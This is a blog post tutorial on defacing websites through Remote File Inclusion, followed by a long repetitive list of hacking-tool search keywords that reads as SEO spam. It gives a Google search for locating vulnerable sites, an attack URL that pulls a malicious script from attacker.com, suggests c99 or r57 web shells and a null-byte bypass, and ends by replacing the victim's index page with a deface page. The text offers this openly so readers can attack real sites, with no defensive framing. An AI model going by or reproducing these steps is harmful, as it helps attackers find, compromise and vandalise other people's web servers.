HOW TO DEFACE A WEBSITE USING REMOTE FILE INCLUSION (RFI)?

HOW TO DEFACE A WEBSITE USING REMOTE FILE INCLUSION (RFI)?

Remote File Inclusion (RFI) is a technique that allows the attacker to upload a malicious code or file on a website or server. The vulnerability exploits the different sort of validation checks in a website and can lead to code execution on server or code execution on the website. This time, I will be writing a simple tutorial on Remote File Inclusion and by the end of the tutorial, I suppose you will know what it is all about and may be able to deploy an attack.
RFI is a common vulnerability. All the website hacking is not exactly about SQL injection. Using RFI you can literally deface the websites, get access to the server and play almost anything with the server. Why it put a red alert to the websites, just because of that you only need to have your common sense and basic knowledge of PHP to execute malicious code. BASH might come handy as most of the servers today are hosted on Linux.

SO, HOW TO HACK A WEBSITE OR SERVER WITH RFI?

First of all, we need to find out an RFI vulnerable website. Let's see how we can find one.
As we know finding a vulnerability is the first step to hack a website or server. So, let's get started and simply go to Google and search for the following query.
inurl: "index.php?page=home"
At the place of home, you can also try some other pages like products, gallery and etc.
If you already a know RFI vulnerable website, then you don't need to find it through Google.
Once we have found it, let's move on to the next step. Let's see we have a following RFI vulnerable website.
http://target.com/index.php?page=home
As you can see, this website pulls documents stored in text format from the server and renders them as web pages. Now we can use PHP include function to pull them out. Let's see how it works.
http://target.com/index.php?page=http://attacker.com/maliciousScript.txt
I have included my malicious code txt URL at the place of home. You can use any shell for malicious scripts like c99, r57 or any other.
Now, if it's a really vulnerable website, then there would be 3 things that can happen.
  1. You might have noticed that the URL consisted of "page=home" had no extension, but I have included an extension in my URL, hence the site may give an error like 'failure to include maliciousScript.txt', this might happen as the site may be automatically adding the .txt extension to the pages stored in server.
  2. In case, it automatically appends something in the lines of .php then we have to use a null byte '' in order to avoid error.
  3. Successful execution.
As we get the successful execution of the code, we're good to go with the shell. Now we'll browse the shell for index.php. And will replace the file with our deface page.
Related word
  1. Hackers Toolbox
  2. Top Pentest Tools
  3. Pentest Tools
  4. Blackhat Hacker Tools
  5. Hack Apps
  6. Hacker Tools Github
  7. Hacker Tools Hardware
  8. Beginner Hacker Tools
  9. Hacks And Tools
  10. Pentest Tools For Windows
  11. Hacking Tools For Kali Linux
  12. Blackhat Hacker Tools
  13. Game Hacking
  14. Hacker
  15. Hacking Tools
  16. Github Hacking Tools
  17. Hack Apps
  18. Pentest Tools Linux
  19. Pentest Tools Github
  20. Pentest Tools Url Fuzzer
  21. Hacker Security Tools
  22. Nsa Hack Tools
  23. Best Hacking Tools 2019
  24. Hacking Tools For Games
  25. How To Make Hacking Tools
  26. Hack Tools
  27. World No 1 Hacker Software
  28. Hacker Tools Free Download
  29. Termux Hacking Tools 2019
  30. Ethical Hacker Tools
  31. Pentest Tools Website
  32. Hacking Tools Kit
  33. Best Hacking Tools 2019
  34. Hacking Tools 2020
  35. Nsa Hack Tools Download
  36. Hacker Tools Online
  37. Hack Tools For Mac
  38. Hacking Tools For Mac
  39. Hacker Tools Apk
  40. Hacker
  41. Hack Tools
  42. Best Hacking Tools 2019
  43. Hacking Tools Usb
  44. Pentest Tools Website Vulnerability
  45. Physical Pentest Tools
  46. Hack Tools Download
  47. How To Install Pentest Tools In Ubuntu
  48. Beginner Hacker Tools
  49. Pentest Tools Website
  50. New Hacker Tools
  51. Easy Hack Tools
  52. Pentest Recon Tools
  53. Pentest Reporting Tools
  54. Easy Hack Tools
  55. Pentest Automation Tools
  56. Nsa Hack Tools Download
  57. Bluetooth Hacking Tools Kali
  58. Usb Pentest Tools
  59. Hack Website Online Tool
  60. Hacking Tools For Kali Linux
  61. Hack Tools For Windows
  62. Termux Hacking Tools 2019
  63. Hacking Tools Kit
  64. Pentest Tools For Mac
  65. Wifi Hacker Tools For Windows
  66. Nsa Hack Tools Download
  67. How To Hack
  68. Hacking Tools Free Download
  69. Pentest Tools Review
  70. Pentest Tools Windows
  71. Pentest Tools Free
  72. Hacking Tools For Windows
  73. Hacker Tool Kit
  74. Top Pentest Tools
  75. Nsa Hacker Tools
  76. Pentest Tools Review
  77. Black Hat Hacker Tools
  78. Tools Used For Hacking
  79. What Are Hacking Tools
  80. Hacking Tools For Games
  81. Hacking Tools Online
  82. Ethical Hacker Tools
  83. Hacking Tools Windows
  84. Pentest Tools For Windows
  85. Pentest Tools Android
  86. How To Make Hacking Tools
  87. Growth Hacker Tools

No hay comentarios:

Publicar un comentario